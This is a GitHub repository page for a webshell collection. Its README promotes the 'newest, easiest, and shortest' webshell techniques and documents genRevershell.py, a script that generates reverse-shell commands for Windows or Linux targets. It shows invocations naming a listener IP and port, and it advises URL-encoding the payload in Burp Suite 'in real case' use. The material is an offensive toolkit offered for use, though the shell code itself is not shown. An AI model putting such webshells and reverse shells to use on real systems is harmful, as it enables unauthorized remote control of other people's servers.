Skip to content

Webshell with the newest, easiest, and shortest code and technique.

Notifications You must be signed in to change notification settings

HoangKien1020/WebShells

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

79 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Web-Shell

I have made webshell project to make sure safety without evil code

File genRevershell.py is use to generate reverse shell via cmd. How to use:

  1. Use python3
  2. Linux OS

To gen for Windows target is : python3 genRevershell.py 192.168.1.6 1234 1

To gen for Linux target is : python3 genRevershell.py 192.168.1.6 1234 2

image

In real case, we need to encode payload as URL(Ctrl+U in Burpsuite):

image

image

About

Webshell with the newest, easiest, and shortest code and technique.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published